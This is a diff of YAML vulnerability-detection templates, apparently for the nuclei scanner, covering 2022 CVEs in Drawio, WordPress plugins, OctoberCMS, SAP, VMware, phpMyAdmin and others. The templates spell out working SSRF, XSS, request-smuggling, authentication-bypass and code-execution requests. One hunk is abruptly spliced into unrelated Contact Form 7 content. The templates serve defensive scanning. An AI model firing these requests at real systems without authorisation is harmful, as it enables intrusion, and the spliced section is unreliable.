cve-id: CVE-2022-1713 cwe-id: CWE-918 - epss-score: 0.01291 - epss-percentile: 0.84282 - cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 - vendor: diagrams - product: drawio shodan-query: http.title:"Flowchart Maker" - tags: drawio,ssrf,oss,huntr,cve,cve2022 - -http: + tags: cve,cve2022,drawio,ssrf,oss +requests: - raw: - | GET /proxy?url=http%3a//0:8080/ HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word part: body words: - "Flowchart Maker & Online Diagram Software" - - type: word part: header words: - "application/octet-stream" -# digest: 4a0a004730450220340503229df1c391b0a3802f5fed307ea9a4341970e8fae14d6f08c6705faf5c022100865d51f43b0937a1ae282797d67abeba4a89355d9532f4f74ff10f841b44c78c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/29 diff --git a/poc/cve/CVE-2022-1815.yaml b/poc/cve/CVE-2022-1815.yaml index 84ecd0837f..62e23a8e4b 100644 --- a/poc/cve/CVE-2022-1815.yaml +++ b/poc/cve/CVE-2022-1815.yaml @@ -1,43 +1,31 @@ id: CVE-2022-1815 - info: - name: Drawio <18.1.2 - Server-Side Request Forgery + name: Drawio < 18.1.2 - Server Side Request Forgery author: amit-jd severity: high description: | - Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. - remediation: | - Upgrade Drawio to version 18.1.2 or later to mitigate the SSRF vulnerability. + SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2. reference: - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1815 - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f - https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1815 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1815 - cwe-id: CWE-918,CWE-200 - epss-score: 0.00928 - epss-percentile: 0.81192 - cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* + cwe-id: CWE-918 metadata: - verified: true - max-request: 1 - vendor: diagrams - product: drawio - tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph - -http: + verified: "true" + tags: cve,cve2022,drawio,ssrf,oast,oss,jgraph +requests: - raw: - | GET /service/0/test.oast.me HTTP/2 Host: {{Hostname}} - matchers: - type: dsl dsl: - "contains(body, 'Interactsh Server')" - status_code == 200 condition: and -# digest: 4b0a00483046022100d4ba06ac28c9b4f15664de0f9a92cbf82be72e59f1ee5f7cd05ee7bfb1fa0c5302210095c69ffd14c4dbce38eb99024acf9531a54794807648fbc8fb2df05ade57dec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1904.yaml b/poc/cve/CVE-2022-1904.yaml index ff73e1073d..44550af381 100644 --- a/poc/cve/CVE-2022-1904.yaml +++ b/poc/cve/CVE-2022-1904.yaml @@ -1,50 +1,35 @@ id: CVE-2022-1904 - info: - name: WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting + name: Easy Pricing Tables < 3.2.1 - Reflected Cross-Site-Scripting author: Akincibor severity: medium description: | - WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled. - remediation: | - Update to the latest version of WordPress Easy Pricing Tables plugin (3.2.1) to mitigate the vulnerability. + The plugin does not sanitize and escape parameter before reflecting it back in a page available to any user (both authenticated and unauthenticated) when a specific setting is enabled, leading to a reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b - - https://nvd.nist.gov/vuln/detail/CVE-2022-1904 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1904 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1904 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40336 - cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 1 - vendor: fatcatapps - product: easy_pricing_tables - framework: wordpress - tags: wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss - -http: + verified: "true" + tags: cve,cve2022,wp-plugin,xss,wp,wordpress +requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=' - matchers-condition: and matchers: - type: word part: body words: - ' - Color' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 490a0046304402200dfa19a5a7a0ebd87e3b030d193dbd46f4352c5740c0207700c8da80e607be6a022024db645700b2359d6a35eecb0a92c6a040a0e5d1640dddd7ee34034d242c4b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1906.yaml b/poc/cve/CVE-2022-1906.yaml index 0de7988bdc..e16db83122 100644 --- a/poc/cve/CVE-2022-1906.yaml +++ b/poc/cve/CVE-2022-1906.yaml @@ -1,28 +1,39 @@ id: CVE-2022-1906 + info: - name: Copyright Proof <= 4.16 - Reflected Cross-Site-Scripting + name: WordPress Copyright Proof <=4.16 - Cross-Site-Scripting author: random-robbie severity: medium description: | - The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting when a specific setting is enabled. + WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. + remediation: | + Update to the latest version of WordPress Copyright Proof plugin (>=4.17) which includes proper input sanitization and validation. reference: - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1906 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1906 cwe-id: CWE-79 + epss-score: 0.00097 + epss-percentile: 0.40336 + cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* metadata: - google-dork: inurl:/wp-content/plugins/digiproveblog - verified: "true" - tags: cve,cve2022,wordpress,xss,wp-plugin,wp -requests: + verified: true + max-request: 1 + vendor: digiprove + product: copyright_proof + framework: wordpress + google-query: inurl:/wp-content/plugins/digiproveblog + tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022 + +http: - raw: - | GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word @@ -30,10 +41,13 @@ requests: words: - "got message " condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 490a004630440220539afbbb7614f275ea3ae0955d4842736b84b10b31a701ac19280010ee2b325502207c3678066304e38f0cf78ae062687de6aa22f6debfdb08a174a3e42831626f0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1937.yaml b/poc/cve/CVE-2022-1937.yaml index f1c8faecc8..8d81785de7 100644 --- a/poc/cve/CVE-2022-1937.yaml +++ b/poc/cve/CVE-2022-1937.yaml @@ -1,13 +1,10 @@ id: CVE-2022-1937 - info: - name: WordPress Awin Data Feed <=1.6 - Cross-Site Scripting + name: Awin Data Feed <= 1.6 - Reflected Cross-Site Scripting author: Akincibor,DhiyaneshDK severity: medium description: | - WordPress Awin Data Feed plugin 1.6 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action, available to both unauthenticated and authenticated users. - remediation: | - Update to the latest version of the WordPress Awin Data Feed plugin (1.6 or higher) to mitigate this vulnerability. + The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting. reference: - https://wpscan.com/vulnerability/eb40ea5d-a463-4947-9a40-d55911ff50e9 - https://nvd.nist.gov/vuln/detail/CVE-2022-1937 @@ -16,18 +13,10 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1937 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40336 - cpe: cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 2 - vendor: awin - product: awin_data_feed - framework: wordpress - tags: cve,cve2022,xss,awin,wpscan,wp-plugin,wp,wordpress,authenticated - -http: + verified: "true" + tags: cve,cve2022,wp-plugin,xss,wp,wordpress,authenticated,awin +requests: - raw: - | POST /wp-login.php HTTP/1.1 @@ -38,12 +27,12 @@ http: - | GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true + req-condition: true matchers: - type: dsl dsl: - - 'contains(header_2, "text/html")' + - 'contains(all_headers_2, "text/html")' - 'status_code_2 == 200' - contains(body_2, 'colspan=\"2\">') condition: and -# digest: 4a0a004730450220584cc41e248fdd4e5d7ede82b4f73c59e55c013f910bf2b6c7b889277d1462790221009a71639dbca66975e622909a29c65a2145db41ec8391634ff9fdfa796a3ef6ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-21705.yaml b/poc/cve/CVE-2022-21705.yaml index 9593590558..d48170c9cf 100644 --- a/poc/cve/CVE-2022-21705.yaml +++ b/poc/cve/CVE-2022-21705.yaml @@ -1,33 +1,23 @@ id: CVE-2022-21705 - info: - name: October CMS - Remote Code Execution + name: OctoberCMS Authenticated Remote Code Execution author: iPhantasmic severity: high description: | - October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions. + Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area. remediation: | - The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. + The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually. reference: - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-21705 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-21705 - cwe-id: CWE-74,NVD-CWE-Other - epss-score: 0.00522 - epss-percentile: 0.74238 - cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* - metadata: - max-request: 5 - vendor: octobercms - product: october + cwe-id: CWE-74 tags: cve,cve2022,authenticated,rce,cms,octobercms,injection - -http: +requests: - raw: - | # to obtain session_key and token GET /backend/backend/auth/signin HTTP/1.1 @@ -65,49 +55,40 @@ http: X-Requested-With: XMLHttpRequest _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'function onInit()' - - 'phpinfo()' - - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.' - condition: and - - # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled - - - type: status - status: - - 200 - + cookie-reuse: true extractors: - type: xpath name: session_key - internal: true + attribute: value xpath: - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" - attribute: value - - # Obtain _session_key for current OctoberCMS session - + internal: true + # Obtain _session_key for current OctoberCMS session - type: xpath name: token - internal: true + attribute: value xpath: - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" - attribute: value - - # Obtain _token for current OctoberCMS session - + internal: true + # Obtain _token for current OctoberCMS session - type: regex name: theme + part: body group: 1 regex: - '' + matchers-condition: and matchers: - type: word @@ -27,10 +40,13 @@ requests: - "" - "Contact Form 7" condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a00473045022100f145e5739cd27980072ebec895fee4de42c05ea932a35b605cc185b4b988098e0220731f2a16fae46104c75bb03a03567449ac32c11f85f09e384265a890b30f7794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-22536.yaml b/poc/cve/CVE-2022-22536.yaml index 193d0c83c3..d029dc872d 100644 --- a/poc/cve/CVE-2022-22536.yaml +++ b/poc/cve/CVE-2022-22536.yaml @@ -1,21 +1,34 @@ id: CVE-2022-22536 + info: name: SAP Memory Pipes (MPI) Desynchronization author: pdteam severity: critical description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. + remediation: | + Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22536 - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022 - https://github.com/Onapsis/onapsis_icmad_scanner - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/ + - https://launchpad.support.sap.com/#/notes/3123396 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2022-22536 cwe-id: CWE-444 - tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes -requests: + epss-score: 0.95701 + epss-percentile: 0.99252 + cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: sap + product: content_server + shodan-query: http.favicon.hash:-266008933 + tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev + +http: - raw: - |+ GET {{sap_path}} HTTP/1.1 @@ -29,22 +42,22 @@ requests: Host: {{Hostname}} payloads: - sap_path: # based on https://github.com/Onapsis/onapsis_icmad_scanner + sap_path: + # based on https://github.com/Onapsis/onapsis_icmad_scanner - /sap/admin/public/default.html - /sap/public/bc/ur/Login/assets/corbu/sap_logo.png + stop-at-first-match: true unsafe: true read-all: true - stop-at-first-match: true + matchers-condition: and matchers: - - type: status - status: - - 200 - type: dsl dsl: - - "contains(tolower(body), 'administration')" # confirms 1st path - - "contains(tolower(all_headers), 'content-type: image/png')" # confirms 2nd path + - "contains(tolower(body), 'administration')" + - "contains(tolower(header), 'content-type: image/png')" condition: or + - type: word part: body words: @@ -53,4 +66,7 @@ requests: - "HTTP/1.0 500 Dispatching Error" condition: or -# Enhanced by mp on 2022/03/08 + - type: status + status: + - 200 +# digest: 4a0a0047304502205863287a57d4e9aa73f4c5618d2ceda056e1d44d6376dc53f8eeec8ac3923a78022100dc80eee5ae506ca3eeb5d2ba1aab21c58f5866d7cc97c2ee826c593f3c5e2de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-2290.yaml b/poc/cve/CVE-2022-2290.yaml index 61f61c9a52..95e4ee6012 100644 --- a/poc/cve/CVE-2022-2290.yaml +++ b/poc/cve/CVE-2022-2290.yaml @@ -1,42 +1,30 @@ id: CVE-2022-2290 - info: - name: Trilium <0.52.4 - Cross-Site Scripting + name: Trilium - Cross-Site Scripting author: dbrwsky severity: medium - description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. - remediation: | - Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability. + description: Cross-site Scripting (XSS) - Reflected in GitHub repository zadam/trilium prior to 0.52.4, 0.53.1-beta. reference: - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/ - https://github.com/zadam/trilium - - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7 - https://nvd.nist.gov/vuln/detail/CVE-2022-2290 + - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2290 cwe-id: CWE-79 - epss-score: 0.00112 - epss-percentile: 0.44562 - cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 3 - vendor: trilium_project - product: trilium shodan-query: title:"Trilium Notes" - tags: cve,cve2022,xss,trilium,huntr - -http: + verified: "true" + tags: cve,cve2022,xss,trilium +requests: - method: GET path: - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E' - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E' - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename' - stop-at-first-match: true - matchers-condition: and matchers: - type: word @@ -45,13 +33,10 @@ http: - "No handler matched for custom " - "Note '' not found" condition: or - - type: word part: header words: - "text/html" - - type: status status: - 404 -# digest: 4b0a00483046022100e568371eb4d2df619288c86a7c53af212ddafb9026990a8577b3b539e909bc26022100c175a69227a5a573c084cb0ea237fd84fe97fabb311373d69d5ecd94b7fb8a2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-22972.yaml b/poc/cve/CVE-2022-22972.yaml index f0934ac0fe..fd63a42624 100644 --- a/poc/cve/CVE-2022-22972.yaml +++ b/poc/cve/CVE-2022-22972.yaml @@ -1,10 +1,13 @@ id: CVE-2022-22972 + info: name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass author: For3stCo1d,princechaddha severity: critical description: | VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + remediation: | + Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972). reference: - https://github.com/horizon3ai/CVE-2022-22972 - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive @@ -15,10 +18,17 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22972 cwe-id: CWE-287 + epss-score: 0.73656 + epss-percentile: 0.97808 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: + max-request: 3 + vendor: vmware + product: identity_manager fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" tags: cve,cve2022,vmware,auth-bypass,oast -requests: + +http: - raw: - | GET /vcac/ HTTP/1.1 @@ -32,62 +42,70 @@ requests: Content-type: application/x-www-form-urlencoded protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in - redirects: true + + host-redirects: true max-redirects: 3 - cookie-reuse: true + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "HZN=" + + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 302 + extractors: - type: regex - part: body name: protected_state group: 1 regex: - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' internal: true - - type: regex part: body + + - type: regex name: horizonRelayState group: 1 regex: - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' internal: true - - type: regex part: body + + - type: regex name: userstore group: 1 regex: - 'id="userstore" value="([a-z.]+)" \/>' internal: true - - type: regex part: body + + - type: regex name: userstoreDisplay group: 1 regex: - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' internal: true - - type: regex part: body + + - type: regex name: stickyConnectorId group: 1 regex: - 'name="stickyConnectorId" value="(.*)"/>' internal: true + part: body + - type: kval - part: header name: HZN-Cookie kval: - 'HZN' - matchers-condition: and - matchers: - - type: word part: header - words: - - "HZN=" - - type: status - status: - - 302 - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/06/01 +# digest: 4a0a0047304502205ea4f76288f0767688c76ac88d6646c7afdc34c972b66c6893d7b3d6fa91a65402210086434def00a915135952f121a758d3eb9cd8e56139bf16acdf6d075f84251f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-23808.yaml b/poc/cve/CVE-2022-23808.yaml index 76fe8e3523..3f6cbaeb07 100644 --- a/poc/cve/CVE-2022-23808.yaml +++ b/poc/cve/CVE-2022-23808.yaml @@ -1,33 +1,58 @@ id: CVE-2022-23808 + info: - name: phpMyAdmin < 5.1.2 - XSS - author: cckuailong + name: phpMyAdmin < 5.1.2 - Cross-Site Scripting + author: cckuailong,daffainfo severity: medium - description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection. + description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. + remediation: | + Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability. reference: - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A - https://github.com/dipakpanchal456/CVE-2022-23808 - https://nvd.nist.gov/vuln/detail/CVE-2022-23808 - tags: cve,cve2022,phpmyadmin,xss + - https://www.phpmyadmin.net/security/PMASA-2022-2/ + - https://infosecwriteups.com/exploit-cve-2022-23808-85041c6e5b97 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-23808 cwe-id: CWE-79 -requests: + epss-score: 0.00154 + epss-percentile: 0.51705 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: phpmyadmin + product: phpmyadmin + shodan-query: http.component:"phpmyadmin" + tags: cve,cve2022,phpmyadmin,xss + +http: - method: GET path: - - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=\">'>" + - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + stop-at-first-match: true + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word - part: header + part: body words: - - "text/html" + - "\">" + - "

Add a new server

" + - "phpMyAdmin setup" + condition: and + - type: word - part: body + part: header words: - - "\">'><script>alert(document.domain)</script>" + - "text/html" + + - type: status + status: + - 200 +# digest: 490a0046304402207ef9c03e2ba89559567a9ea490a43e71d81964ca36c5c0498387428d33ef02770220105bdfaeadca81a017e95a173fa5c0d08952f5c278eaae804c9e3fc0be2d151a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-23944.yaml b/poc/cve/CVE-2022-23944.yaml index 2538469391..d7ffa8675e 100644 --- a/poc/cve/CVE-2022-23944.yaml +++ b/poc/cve/CVE-2022-23944.yaml @@ -1,36 +1,22 @@ id: CVE-2022-23944 - info: name: Apache ShenYu Admin Unauth Access author: cckuakilong - severity: critical - description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1. + severity: medium + description: "Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1." remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch. reference: - https://github.com/apache/incubator-shenyu/pull/2462 - https://nvd.nist.gov/vuln/detail/CVE-2022-23944 - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md - - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y - - http://www.openwall.com/lists/oss-security/2022/01/25/15 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.1 cve-id: CVE-2022-23944 - cwe-id: CWE-306,CWE-862 - epss-score: 0.42994 - epss-percentile: 0.96982 - cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: apache - product: shenyu + cwe-id: CWE-862 tags: cve,cve2022,shenyu,unauth,apache - -http: +requests: - method: GET path: - "{{BaseURL}}/plugin" - matchers-condition: and matchers: - type: word @@ -39,8 +25,8 @@ http: - '"message":"query success"' - '"code":200' condition: and - - type: status status: - 200 -# digest: 4b0a00483046022100ddae40f6f89f1fe24f409a95d9b0ec4473092050de7b824991b629cbad6e5523022100a60546c2643a321a709a4a341ad80214d5f1ecad1481a20cc092fe0304f4e0eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/08 diff --git a/poc/cve/CVE-2022-24681.yaml b/poc/cve/CVE-2022-24681.yaml index 56b957f25b..ae88561611 100644 --- a/poc/cve/CVE-2022-24681.yaml +++ b/poc/cve/CVE-2022-24681.yaml @@ -1,60 +1,43 @@ id: CVE-2022-24681 - info: - name: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting + name: ManageEngine ADSelfService - Stored XSS author: Open-Sec severity: medium description: | - ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. - remediation: | - Upgrade to a version of ManageEngine ADSelfService Plus that is higher than 6121 to mitigate this vulnerability. + Zoho ManageEngine ADSelfService Plus before 6121 allows XSS via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screen. reference: - https://raxis.com/blog/cve-2022-24681 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html - https://manageengine.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 - - https://www.manageengine.com/products/self-service-password/kb/CVE-2022-24681.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-24681 cwe-id: CWE-79 - epss-score: 0.00155 - epss-percentile: 0.5183 - cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: zohocorp - product: manageengine_adselfservice_plus tags: cve,cve2022,manageengine,xss,authenticated - -http: +requests: - raw: - | POST /servlet/GetProductVersion HTTP/1.1 Host: {{Hostname}} - + extractors: + - type: regex + part: body + name: buildnumber + group: 1 + regex: + - '"BUILD_NUMBER":"([0-9]+)",' + internal: true matchers-condition: and matchers: - type: dsl dsl: - compare_versions(buildnumber, '< 6121') - - type: word part: body words: - "ManageEngine" - - type: status status: - 200 - - extractors: - - type: regex - name: buildnumber - group: 1 - regex: - - '"BUILD_NUMBER":"([0-9]+)",' - internal: true - part: body -# digest: 4b0a00483046022100943bdfc6b66835ee4a234741e43d2ec75b694950e279f5242e7a01a4678f7b0b022100a2186b5ffdf981315dfaf2d8cff304a9da997e188f67a9f66a51044c21c7b4ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-2486.yaml b/poc/cve/CVE-2022-2486.yaml index 2c3533d673..9112ebd6f1 100644 --- a/poc/cve/CVE-2022-2486.yaml +++ b/poc/cve/CVE-2022-2486.yaml @@ -1,34 +1,48 @@ id: CVE-2022-2486 + info: - name: Wavlink Mesh.cgi - Remote Code Execution + name: Wavlink WN535K2/WN535K3 - OS Command Injection author: For3stCo1d severity: critical description: | - A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used. + Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - 